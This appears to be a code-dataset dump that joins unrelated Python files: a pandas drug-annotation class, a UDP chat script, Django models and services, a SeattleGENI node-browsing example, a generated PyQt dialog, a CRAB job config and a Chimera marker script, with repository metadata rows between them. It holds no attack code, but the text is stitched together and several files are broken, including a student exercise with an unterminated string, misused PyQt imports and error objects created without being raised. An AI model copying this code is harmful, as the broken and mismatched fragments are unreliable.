# if the input data is already a DrugDecode instance, this should
# fail since the expected df will not have the DRUG_ID field, that
# should be the index
self._interpret()
except:
pass
self.df = self.df[sorted(self.df.columns)]
def _interpret(self, filename=None):
N = len(self.df)
if N == 0:
return
self.df.rename(columns={
'PUTATIVE_TARGET': 'DRUG_TARGET',
'THERAPEUTIC_TARGET': 'DRUG_TARGET'},
inplace=True)
for column in ["WEBRELEASE", "OWNED_BY"] + self.header_extra:
if column not in self.df.columns:
self.df[column] = [np.nan] * N
#for this in self.header[1:]:
for this in self.header:
msg = " The column %s was not found and may be an issue later on."
if this not in self.df.columns and this != self.df.index.name:
logger.warning(msg % this )
# Finally, set the drug ids as the index.
try:
self.df.set_index('DRUG_ID', inplace=True)
except:
# could be done already
pass
self.df.index = [drug_name_to_int(x) for x in self.df.index]
self.df.index = self.df.index.astype(int)
self.df.index.name = "DRUG_ID"
# sort the columns
try:
self.df.sort_index(inplace=True)
except:
self.df = self.df.ix[sorted(self.df.index)]
self._check_uniqueness(self.df.index)
def _get_names(self):
return list(self.df.DRUG_NAME.values)
drug_names = property(_get_names)
def _get_target(self):
return list(self.df.DRUG_TARGET.values)
drug_targets = property(_get_target)
def _get_drug_ids(self):
return list(self.df.index)
drugIds = property(_get_drug_ids,
doc="return list of drug identifiers")
def _get_row(self, drug_id, colname):
if drug_id in self.df.index:
return self.df.ix[drug_id][colname]
elif str(drug_id).startswith("Drug_"):
try:
drug_id = int(drug_id.split("_")[1])
except:
print("DRUG ID %s not recognised" % drug_id)
return
if drug_id in self.df.index:
return self.df[colname].ix[drug_id]
elif "_" in str(drug_id):
try:
drug_id = int(drug_id.split("_")[0])
except:
print("DRUG ID %s not recognised" % drug_id)
return
if drug_id in self.df.index:
return self.df[colname].ix[drug_id]
else:
return
def get_name(self, drug_id):
return self._get_row(drug_id, 'DRUG_NAME')
def get_target(self, drug_id):
return self._get_row(drug_id, 'DRUG_TARGET')
def is_public(self, drug_id):
return self._get_row(drug_id, 'WEBRELEASE')
def check(self):
for x in self.drugIds:
try:
x += 1
except TypeError as err:
print("drug identifiers must be numeric values")
raise err
# it may happen that a drug has no target in the database ! so we
# cannot check that for the moment:
#if self.df.isnull().sum().sum()>0:
# print(d.df.isnull().sum())
# raise ValueError("all values must be non-na. check tabulation")
def get_info(self):
# Note that there are 4 cases : Y, N, U (unknown?) and NaN
dd = { 'N': len(self),
'N_public': sum(self.df.WEBRELEASE == 'Y'),
'N_prop': sum(self.df.WEBRELEASE != 'Y')}
return dd
def __len__(self):
return len(self.df)
def __str__(self):
txt = "Number of drugs: %s\n" % len(self.df)
return txt
def __repr__(self):
txt = self.__str__()
if len(self.companies):
txt += "Contains %s companies" % len(self.companies)
return txt
def _get_companies(self):
if 'OWNED_BY' in self.df.columns:
companies = list(self.df.OWNED_BY.dropna().unique())
else:
companies = []
return sorted(companies)
companies = property(_get_companies)
def drug_annotations(self, df):
"""Populate the drug_name and drug_target field if possible
:param df: input dataframe as given by e.g., :meth:`anova_one_drug`
:return df: same as input but with the FDR column populated
"""
if len(self.df) == 0:
return df
# print("Nothing done. DrugDecode is empty.")
# aliases
if 'DRUG_ID' not in df.columns:
raise ValueError('Expected column named DRUG_ID but not found')
drug_names = [self.get_name(x) for x in df.DRUG_ID.values]
drug_target = [self.get_target(x) for x in df.DRUG_ID.values]
# this is not clean. It works but could be simpler surely.
df['DRUG_NAME'] = drug_names
df['DRUG_TARGET'] = drug_target
return df
def __add__(self, other):
"""
Fill missing values but do not overwrite existing fields even though
the field in the other DrugDecode instance is difference.
"""
# Problably not efficient but will do for now
columns = list(self.df.columns)
dd = DrugDecode()
dd.df = self.df.copy()
# add missing entires
missing = [x for x in other.df.index if x not in self.df.index]
dd.df = dd.df.append(other.df.ix[missing])
# merge existing ones
for index, ts in other.df.iterrows():
# add the drug if not already present
if index in self.df.index:
# here it is found in the 2 instances but
# they may contain either complementary data, which
# could have been done with pandas.merge but we wish
# to check for incompatible data
for column in columns:
a = dd.df.ix[index][column]
b = ts[column]
if pd.isnull(b) is True:
# nothing to do if b is NULL
pass
elif pd.isnull(a) is True:
# we can merge the content of b into a
# that is the content of other into this instance
dd.df.loc[index,column] = b
else:
# a and b are not null
if a != b:
print('WARNING: different fields in drug %s (%s %s %s)' % (index, column, a, b))
return dd
def __eq__(self, other):
try:
return all(self.df.fillna(0) == other.df.fillna(0))
except:
return False
def get_public_and_one_company(self, company):
"""Return drugs that belong to a specific company and public drugs"""
drug_decode_company = self.df.query(
"WEBRELEASE=='Y' or OWNED_BY=='%s'" % company)
# Transform into a proper DrugDecode class for safety
return DrugDecode(drug_decode_company)
| [
"[email protected]"
] | |
4d4bf41cfc6668556e18405c2b1da9e6f85f8787 | e0e96b8d26cd12c16a3e4a6265b6bceb11c4b1f0 | /17day/updtest.py | 2d6ca62c4a6dff1d92723fc2cea303250088b3cf | [] | no_license | superwenqistyle/2-2018python | 4419bc4ae4700e5b7839c4974106e03fc33e85f8 | 76e5ea72413abfa774ad61b3bdff76eba0c5e16c | refs/heads/master | 2020-03-13T11:08:50.860361 | 2018-05-22T11:17:39 | 2018-05-22T11:17:39 | 131,096,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | from socket import *
from threading import Thread
from time import ctime
Id=""
port=0
updSocket=None
def send():
while True:
message=input("请输入内容:")
updSocket.sendto(message.encode("gb2312"),(Id,port))
def receive():
while True:
content=updSocket.recvfrom(1024)
print("%s-%s\n请输入内容:"%(content[0].decode("gb2312"),content[1][0]),end="")
def main():
global Id
global port
global updSocket
Id = input("输入对方的id:")
port = int(input("输入对方的端口号:"))
updSocket = socket(AF_INET,SOCK_DGRAM)
updSocket.bind(("",6666))
t = Thread(target=send)
t1 = Thread(target=receive)
t.start()
t1.start()
t.join()
t1.join()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
1626df6646682430eb9d47c57614e0fc6c70476f | 194124b184101bbeb18c00482a1f60a6dd32eebf | /blog/migrations/0002_category.py | a811ab55f0b35be64c8208579dfff5eb7e36a19a | [] | no_license | fc-wsd/s4-instablog | 2fc758461f09fe124b28d86d29d4df429ef72040 | 8e38b07fe7dae0378fda228f2cfa7752f93254c9 | refs/heads/master | 2021-01-10T12:13:09.293036 | 2015-12-12T06:13:34 | 2015-12-12T06:13:34 | 45,733,935 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),
('name', models.CharField(max_length=200)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"[email protected]"
] | |
abeeec02fe789c788714f86d5410f5b957b7b6c1 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_276/ch49_2019_04_04_15_20_35_762666.py | 9d3cc6514e971164771488683d6fcc0b8efa07d7 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 106 | py | a = input('Digite um número inteiro positivo: )
lista = []
while a > 0:
lista.append(a)
print[ : :-1] | [
"[email protected]"
] | |
01b828d2865b4a3207556680e892c62aa6f28e15 | 2b468b1d22ecc5668529255676a1d43936829074 | /codes/personal_backend/tuoen/abs/service/product/__init__.py | 43853f724363e33396251d2f10c21af53b191a1a | [] | no_license | MaseraTiGo/4U | 5ac31b4cccc1093ab9a07d18218c3d8c0157dc9c | f572830aa996cfe619fc4dd8279972a2f567c94c | refs/heads/master | 2023-07-26T09:44:21.014294 | 2023-07-13T03:43:34 | 2023-07-13T03:43:34 | 149,217,706 | 0 | 0 | null | 2020-06-05T20:38:16 | 2018-09-18T02:34:29 | Python | UTF-8 | Python | false | false | 3,304 | py | # coding=UTF-8
'''
Created on 2016年7月22日
@author: Administrator
'''
import hashlib
import datetime
import json
import random
from django.db.models import Q
from tuoen.sys.core.exception.business_error import BusinessError
from tuoen.sys.utils.common.split_page import Splitor
from model.models import ProductModel
from model.models import Product
class ProductOperateServer(object):
@classmethod
def add(cls, **attrs):
"""add new product"""
if Product.query(name=attrs['name']):
BusinessError("产品名称已存在")
product = Product.create(**attrs)
if not product:
raise BusinessError("产品添加失败")
@classmethod
def update(cls, **attrs):
"""修改产品信息"""
if 'name' in attrs:
name = attrs['name']
id_qs = [p.id for p in Product.query(name=name)]
if id_qs and attrs['id'] not in id_qs:
raise BusinessError("产品名称已存在")
product = Product().update(**attrs)
return product
@classmethod
def search(cls, current_page, **search_info):
"""查询产品列表"""
if 'keyword' in search_info:
keyword = search_info.pop('keyword')
product_qs = Product.search(**search_info).filter(Q(name__contains = keyword) | \
Q(id__contains = keyword))
else:
product_qs = Product.search(**search_info)
product_qs = product_qs.order_by("-create_time")
return Splitor(current_page, product_qs)
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
Product.query(id=id).delete()
return True
class ProductModelServer(object):
@classmethod
def add(cls, **attrs):
"""add new product model"""
if ProductModel.query(name=attrs['name']):
BusinessError("产品型号已存在")
product_id = attrs['product']
product = Product.get_byid(product_id)
attrs.update({"product": product})
product_model = ProductModel.create(**attrs)
if not product_model:
raise BusinessError("产品型号添加失败")
@classmethod
def update(cls, **attrs):
"""修改产品型号信息"""
product = ProductModel.query(id=attrs['id'])[0].product
attrs.update({'product': product})
if 'name' in attrs:
name = attrs['name']
product__model_ids = [pm.id for pm in ProductModel.query(name=name)]
if product__model_ids and attrs['id'] not in product__model_ids:
raise BusinessError("产品型号已存在")
product__model = ProductModel().update(**attrs)
return product__model
@classmethod
def search(cls, **search_info):
""""查询产品型号"""
product_id = search_info.pop('id')
product = Product.get_byid(product_id)
product_model_qs = ProductModel.search(product=product)
product_model_qs = product_model_qs.order_by("-create_time")
return product_model_qs
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
ProductModel.query(id=id).delete()
return True | [
"[email protected]"
] | |
919890dfa27b2785488ab4ec815c2d7c9bf0faa7 | 9cac3bc1c61f4de32251072e49c50b0543450490 | /examples/find_available_seattlegeni_vessels.py | 412176990dffaec0800a9c6acb8ef925e3c14bd2 | [
"MIT"
] | permissive | SeattleTestbed/experimentmanager | 40b036028809fa77dcdec804d58853f679e326de | 31c52f35fba1e367b1177b3a95ae65b4dd0e1a1c | refs/heads/master | 2020-12-25T17:34:49.713296 | 2017-05-15T11:37:36 | 2017-05-15T11:37:36 | 20,136,879 | 0 | 5 | null | 2016-08-29T09:00:07 | 2014-05-24T18:43:36 | Python | UTF-8 | Python | false | false | 4,356 | py | """
This script will look up all active nodes that are part of a testbed managed
by SeattleGENI and determine which vessels on those nodes are available.
This information could be used in various ways, one of them being to gather
information about those node locations, such as latency from a certain
location, and decide which vessels to acquire based on that information.
Note: This script can result in a large amount of of node communication.
Specifically, it will try to communicate with every node that is part of
the testbed.
Example output of this script:
Number of advertising nodes: 452
DEBUG: only looking at 5 nodes.
Failure on NAT$2dfeca92a68744eb493cf5ba5559cdcee03684c5v2:1224: Connection Refused! ['[Errno 111] Connection refused']
On 1.1.1.1:1224 found 6 available vessels
On 4.4.4.4:1224 found 6 available vessels
On 3.3.3.3:1224 found 5 available vessels
Failure on 2.2.2.2:1224: timed out
Number of nodes that SeattleGENI vessels are available on: 3
"""
import sys
import traceback
# If this script resides outside of the directory that contains the seattlelib
# files and experimentlib.py, then you'll need to set that path here.
EXPERIMENTLIB_DIRECTORY = "./experimentlibrary/"
sys.path.append(EXPERIMENTLIB_DIRECTORY)
import experimentlib
# This can be used to adjust how many threads are used for concurrently
# contacting nodes when experimentlib.run_parallelized() is called.
#experimentlib.num_worker_threads = 10
# The public key that all seattlegeni nodes advertise under.
SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME = "seattlegeni_advertisement.publickey"
# Useful for development. Only contact this many nodes.
MAX_NODES_TO_LOOK_AT = 5
def main():
identity = experimentlib.create_identity_from_key_files(SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME)
nodelocation_list = experimentlib.lookup_node_locations_by_identity(identity)
print("Number of advertising nodes: " + str(len(nodelocation_list)))
if MAX_NODES_TO_LOOK_AT is not None:
print("DEBUG: only looking at " + str(MAX_NODES_TO_LOOK_AT) + " nodes.")
nodelocation_list = nodelocation_list[:MAX_NODES_TO_LOOK_AT]
# Talk to each nodemanager to find out vessel information.
browse_successlist, failurelist = \
experimentlib.run_parallelized(nodelocation_list, browse_node_for_available_vessels)
# Create a dictionary whose keys are the nodeids and values are lists of
# vesseldicts of the available vessels on that node.
available_vesseldicts_by_node = {}
for (nodeid, available_vesseldicts) in browse_successlist:
if available_vesseldicts:
available_vesseldicts_by_node[nodeid] = available_vesseldicts
print("Number of nodes that SeattleGENI vessels are available on: " +
str(len(available_vesseldicts_by_node.keys())))
def browse_node_for_available_vessels(nodelocation):
"""
Contact the node at nodelocation and return a list of vesseldicts
for each vessel on the node.
"""
try:
# Ask the node for information about the vessels on it.
vesseldict_list = experimentlib.browse_node(nodelocation)
# Gather up a list of vesseldicts of the available vessels.
available_vesseldict_list = []
for vesseldict in vesseldict_list:
if is_vessel_available(vesseldict):
available_vesseldict_list.append(vesseldict)
# Just so we can watch the progress, print some output.
# We display the nodelocation rather than the nodeid because it's more
# interesting to look at, even though nodes can change location and this
# isn't a unique identifier of the node.
print("On " + nodelocation + " found " +
str(len(available_vesseldict_list)) + " available vessels")
return available_vesseldict_list
except experimentlib.NodeCommunicationError, e:
print("Failure on " + nodelocation + ": " + str(e))
except:
traceback.print_exc()
def is_vessel_available(vesseldict):
"""
This returns True or False depending on whether the vesseldict indicates an
an available vessel. That is, one that can be acquired through SeattleGENI.
"""
if vesseldict['vesselname'] == 'v2':
# v2 is a special vessel that will never be available from SeattleGENI.
return False
else:
# If there are no userkeys, the vessel is available.
return len(vesseldict['userkeys']) == 0
if __name__ == "__main__":
main()
| [
"USER@DOMAIN"
] | USER@DOMAIN |
871588cf841884f7fc798cea219e466dad82e5ed | c123cb27fbb807acbc4a8bc6148e539dc8c3c3a3 | /view/Ui_CadastrePageReportDialog.py | bf2daf3ef71c709552d9ebe8c80c5b11dea33fb7 | [] | no_license | ankhbold/lm3_mgis | 0b1e5498adc3d556b7ea0656ae9fdc02c47fc0f7 | a2b4fbdcf163662c179922698537ea9150ba16e5 | refs/heads/master | 2020-08-06T20:17:49.049160 | 2019-10-08T05:35:05 | 2019-10-08T05:35:05 | 213,139,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,886 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'D:\work\LAND_MANAGER\lm2\view\CadastrePageReportDialog.ui.'
#
# Created by: PyQt5 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_CadastrePageReportDialog(object):
def setupUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setObjectName(_fromUtf8("CadastrePageReportDialog"))
CadastrePageReportDialog.resize(732, 453)
self.close_button = QtGui.QPushButton(CadastrePageReportDialog)
self.close_button.setGeometry(QtCore.QRect(650, 410, 75, 23))
self.close_button.setObjectName(_fromUtf8("close_button"))
self.find_button = QtGui.QPushButton(CadastrePageReportDialog)
self.find_button.setGeometry(QtCore.QRect(450, 59, 75, 23))
self.find_button.setObjectName(_fromUtf8("find_button"))
self.cpage_twidget = QtGui.QTableWidget(CadastrePageReportDialog)
self.cpage_twidget.setGeometry(QtCore.QRect(10, 110, 718, 292))
self.cpage_twidget.setObjectName(_fromUtf8("cpage_twidget"))
self.cpage_twidget.setColumnCount(7)
self.cpage_twidget.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(3, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(4, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(5, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(6, item)
self.results_label = QtGui.QLabel(CadastrePageReportDialog)
self.results_label.setGeometry(QtCore.QRect(10, 90, 201, 16))
self.results_label.setText(_fromUtf8(""))
self.results_label.setObjectName(_fromUtf8("results_label"))
self.print_button = QtGui.QPushButton(CadastrePageReportDialog)
self.print_button.setGeometry(QtCore.QRect(550, 410, 75, 23))
self.print_button.setObjectName(_fromUtf8("print_button"))
self.line = QtGui.QFrame(CadastrePageReportDialog)
self.line.setGeometry(QtCore.QRect(0, 20, 731, 16))
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.line_2 = QtGui.QFrame(CadastrePageReportDialog)
self.line_2.setGeometry(QtCore.QRect(0, 430, 731, 16))
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.label_2 = QtGui.QLabel(CadastrePageReportDialog)
self.label_2.setGeometry(QtCore.QRect(10, 10, 281, 16))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.print_year_chbox = QtGui.QCheckBox(CadastrePageReportDialog)
self.print_year_chbox.setGeometry(QtCore.QRect(330, 40, 101, 17))
self.print_year_chbox.setObjectName(_fromUtf8("print_year_chbox"))
self.print_year_sbox = QtGui.QSpinBox(CadastrePageReportDialog)
self.print_year_sbox.setEnabled(False)
self.print_year_sbox.setGeometry(QtCore.QRect(330, 59, 91, 22))
self.print_year_sbox.setMinimum(2000)
self.print_year_sbox.setMaximum(2100)
self.print_year_sbox.setProperty("value", 2017)
self.print_year_sbox.setObjectName(_fromUtf8("print_year_sbox"))
self.label_3 = QtGui.QLabel(CadastrePageReportDialog)
self.label_3.setGeometry(QtCore.QRect(10, 40, 171, 16))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.person_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.person_id_edit.setGeometry(QtCore.QRect(10, 60, 150, 20))
self.person_id_edit.setObjectName(_fromUtf8("person_id_edit"))
self.parcel_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.parcel_id_edit.setGeometry(QtCore.QRect(170, 60, 150, 20))
self.parcel_id_edit.setObjectName(_fromUtf8("parcel_id_edit"))
self.label_4 = QtGui.QLabel(CadastrePageReportDialog)
self.label_4.setGeometry(QtCore.QRect(170, 40, 151, 16))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.retranslateUi(CadastrePageReportDialog)
QtCore.QMetaObject.connectSlotsByName(CadastrePageReportDialog)
def retranslateUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setWindowTitle(_translate("CadastrePageReportDialog", "Dialog", None))
self.close_button.setText(_translate("CadastrePageReportDialog", "close", None))
self.find_button.setText(_translate("CadastrePageReportDialog", "Find", None))
item = self.cpage_twidget.horizontalHeaderItem(0)
item.setText(_translate("CadastrePageReportDialog", "ID", None))
item = self.cpage_twidget.horizontalHeaderItem(1)
item.setText(_translate("CadastrePageReportDialog", "PrintDate", None))
item = self.cpage_twidget.horizontalHeaderItem(2)
item.setText(_translate("CadastrePageReportDialog", "Page Number", None))
item = self.cpage_twidget.horizontalHeaderItem(3)
item.setText(_translate("CadastrePageReportDialog", "Person ID", None))
item = self.cpage_twidget.horizontalHeaderItem(4)
item.setText(_translate("CadastrePageReportDialog", "Right Holder", None))
item = self.cpage_twidget.horizontalHeaderItem(5)
item.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
item = self.cpage_twidget.horizontalHeaderItem(6)
item.setText(_translate("CadastrePageReportDialog", "Streetname-Khashaa", None))
self.print_button.setText(_translate("CadastrePageReportDialog", "Print", None))
self.label_2.setText(_translate("CadastrePageReportDialog", "Cadastre page report", None))
self.print_year_chbox.setText(_translate("CadastrePageReportDialog", "Year Print", None))
self.label_3.setText(_translate("CadastrePageReportDialog", "Person ID", None))
self.label_4.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
| [
"[email protected]"
] | |
4305a9232a81ce0a924a5bae10cd5e4b6444862a | 171a89102edf10901e18a2c0f41c3313608d2324 | /src/rogerthat/cron/send_unread_reminder.py | 2f76a5ae8ad60c5efdeacb4ee60c30ac0549458b | [
"Apache-2.0"
] | permissive | gitter-badger/rogerthat-backend | 7e9c12cdd236ef59c76a62ac644fcd0a7a712baf | ab92dc9334c24d1b166972b55f1c3a88abe2f00b | refs/heads/master | 2021-01-18T06:08:11.435313 | 2016-05-11T08:50:20 | 2016-05-11T08:50:20 | 58,615,985 | 0 | 0 | null | 2016-05-12T06:54:07 | 2016-05-12T06:54:07 | null | UTF-8 | Python | false | false | 834 | py | # -*- coding: utf-8 -*-
# Copyright 2016 Mobicage NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.1@@
from rogerthat.bizz.job.send_unread_messages import send
from google.appengine.ext import webapp
class UnreadMessageReminderHandler(webapp.RequestHandler):
def get(self):
send(dry_run=False)
| [
"[email protected]"
] | |
25622946d4cc694e63901dc2980ec2fa9f1ae137 | 57c62abd33f8b508e357ca8631a160ce85a7f340 | /ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/crab_FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8.py | 4470aec7aea4019d8df76db06409c83c17dfeaf4 | [] | no_license | jainshilpi/aNTGC_ggNtuplizer | 8973ce3cdab293317fd928679b14038f03c10976 | 7153d73fbee35969dad0d85c6517e577a0546566 | refs/heads/master | 2022-09-18T07:39:40.246699 | 2020-04-20T13:03:20 | 2020-04-20T13:03:20 | 267,979,045 | 1 | 1 | null | 2020-05-30T00:09:36 | 2020-05-30T00:09:36 | null | UTF-8 | Python | false | false | 2,178 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
import sys
config = config()
#**************************submit function***********************
from CRABAPI.RawCommand import crabCommand
from CRABClient.ClientExceptions import ClientException
from httplib import HTTPException
def submit(config):
try:
crabCommand('submit', config = config)
except HTTPException as hte:
print "Failed submitting task: %s" % (hte.headers)
except ClientException as cle:
print "Failed submitting task: %s" % (cle)
#****************************************************************
workarea='/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/'
mainOutputDir = '/store/user/mwadud/aNTGC/ggNtuplizerSkim/xSecs/'
config.General.requestName = 'FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8'
config.General.transferLogs = True
config.General.workArea = '%s' % workarea
config.Site.storageSite = 'T2_US_Wisconsin'
config.Site.whitelist = ['T3_US_UCR','T3_US_FNALLPC','T2_US_Purdue','T3_US_Rice','T3_US_Cornell','T3_US_Rutgers','T3_US_FIU','T3_US_FIT','T3_US_PSC','T3_US_OSU','T3_US_TAMU','T3_US_UMD','T3_US_VC3_NotreDame','T3_US_SDSC','T3_US_Colorado','T3_US_OSG','T3_US_Princeton_ICSE','T3_US_NERSC','T3_US_Baylor','T2_US_Nebraska','T2_US_UCSD','T2_US_Wisconsin','T2_US_MIT','T3_US_TACC','T3_US_TTU','T3_US_UMiss']
config.Site.blacklist = ['T2_US_Florida','T2_US_Vanderbilt','T3_US_PuertoRico','T2_US_Caltech']
config.JobType.psetName = '/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/XsecAna.py'
config.JobType.pluginName = 'Analysis'
config.Data.inputDataset = '/GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall17MiniAODv2-PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/MINIAODSIM'
config.Data.publication = False
config.Data.allowNonValidInputDataset = True
config.Data.outLFNDirBase = '%s' % mainOutputDir
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 5000
config.Data.ignoreLocality = True
config.Data.totalUnits = 5000
submit(config)
| [
"[email protected]"
] | |
1cdc35d465e2d36f6b9dbcee0ccaa1c9a68fe7fd | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_24852.py | 0c27ea11820885c9563e4852cbe27378470e68f3 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,839 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((536.102, 420.6, 619.247), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((531.774, 477.248, 575.871), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((530.591, 547.332, 531.073), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((574.999, 545.265, 662.572), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((514.88, 674.99, 390.318), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((525.726, 456.842, 592.226), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((525.401, 456.177, 592.771), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((497.945, 461.622, 593.485), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((489.47, 488.345, 593.387), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((466.432, 482.69, 608.386), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((441.086, 490.185, 617.892), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((442.367, 466.112, 632.426), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((535.76, 430.229, 594.197), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((346.573, 497.307, 666.033), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((381.477, 607.364, 500.136), (0, 0, 0.8), 18.4716)
